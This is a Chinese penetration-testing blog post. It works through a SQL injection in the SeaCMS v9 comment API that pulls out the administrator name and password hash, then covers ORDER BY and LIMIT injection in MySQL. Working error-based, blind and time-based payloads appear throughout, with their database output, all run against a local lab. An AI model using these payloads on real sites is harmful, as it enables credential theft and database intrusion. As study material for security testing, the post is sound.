seacmsv9注入管理员账号密码+orderby+limit

兔兔和草草

已于 2025-03-10 19:09:03 修改

阅读量622

点赞数 15

文章标签：渗透测试漏洞挖掘

于 2025-03-10 17:48:46 首次发布

本文链接：https://blog.youkuaiyun.com/qq_73859306/article/details/146159077

版权

seacmsv9 SQL注入漏洞
seacms漏洞介绍

海洋影视管理系统（seacms，海洋cms）是一套专为不同需求的站长而设计的视频点播系统，采用的是 php5.X+mysql 的架构，seacmsv9漏洞文件：./comment/api/index.php，漏洞参数：$rlist

漏洞绕过
由于seacms开源，可以知道seacmsv9系统数据库（mysql）为seacms，存放管理员账号的表为
sea_admin，表中存放管理员姓名的字段为name，存放管理员密码的字段为password

经过源码分析，使用以下语句注入（limit避免管理员有多个，导致SQL语句报错）：
name：
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`

第一次尝试：

并没有成功，使用Wireshark抓包发现最终执行的SQL为：

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment

WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC

在mysql数据库中执行这个SQL语句，并没有报错报出管理员姓名

而下面修改为查询database()却能报出数据库名

经过查阅资料，发现是前面sea_comment表没数据（上图），导致并没有执行报错中的
查询语句，而database()能执行，应该是优先执行的问题，而sea_comment表中应该是
有数据的，于是就插入了一条数据，但发现还是没有执行，于是又插入了一条数据，发
现可以执行了

最后，再次在地址栏尝试注入语句，成功注入出账号为admin

password：
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`
密码同理
注入密码为23a7bbd73250516f069d，可以看出是经过md5加密的，于是到https://cmd5.com/
解密，得到密码为admin123
自此，得到管理员账号为admin，密码为admin123

order by注入

介绍

顾名思义，注入点出现在oder by后面即可称为order by 注入

正常的oder by 语句：

select * from users order by id desc;

当desc此处位置参数可控时，即有可能存在oreder by注入，那么如何在这样的情况下注出我们想要的数据呢？

1.如果有报错信息输出，可尝试通过报错注入完成sql注入攻击

2.如果没有回显，可尝试盲注的手法来注入

通过报错注入（有回显）
这里用updatexml函数来执行报错注入的效果：

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库

获取数据库个数

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

获取数据库列表

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'

获取表个数

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'

获取表名

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'

获取字段个数

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'

获取信息

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'

通过盲注（没有回显）
另外就是没有order by注入没有回显的情况，这时就该用到盲注了，也就是说采取根据页面回显的状态进行判断的形式来进行布尔盲注。首先这里运用到了一个异或的知识，0异或任何数值都还是这个值的本身，比如说0^10010的值还是10010。接着再来看刚刚的简单sql语句

select * from users order by id desc;

这里的desc是可控字符串的话，我们让这条语句变下形：

select * from users order by id ^0;

这样的话，由于order by默认是升序排列的，没有desc也没有影响，同时，加上了^0也还是id本身，所以跟原来正常的排序没有任何的变化。

select * from users order by id ^1;

但如果是加上了^1的话，就会跟原来的排序发生明显变化，盲注也就通过这里的变化来判断我们注入的sql语句是否返回1。

另外，这里的盲注还用到了regexp,最终的sql注入语句变为：

select * from users order by id ^(select(select version()) regexp '^5');

limit 注入

一般实际过程中使用 limit 时，大概有两种情况，一种使用order by，一种就是不使用 order by关键字

不存在 order by 关键字

执行语句

select id from users limit 0,1
此时后面再次使用union将会报错
除了union 就没有其他可以使用的了吗，非也
此方法适用于5.0.0< MySQL <5.6.6版本，在limit语句后面的注入
MySQL 5中的SELECT语法：

SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[WHERE where_condition]
[GROUP BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[HAVING where_condition]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR UPDATE | LOCK IN SHARE MODE]]

limit 关键字后面还可跟PROCEDURE和 INTO两个关键字，但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限，因此利用比较难，因此这里以PROCEDURE为例进行注入

使用 PROCEDURE函数进行注入
ANALYSE支持两个参数，首先尝试一下默认两个参数

mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

报错，尝试一下对其中一个参数进行注入，这里首先尝试报错注入

mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'

成功爆出 mysql 版本信息，证明如果存在报错回显的话，可以使用报错注入在limit后面进行注入
如果不回显那就延迟注入

select id from users order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, BENCHMARK(5000000,SHA1(1)),1))))),1)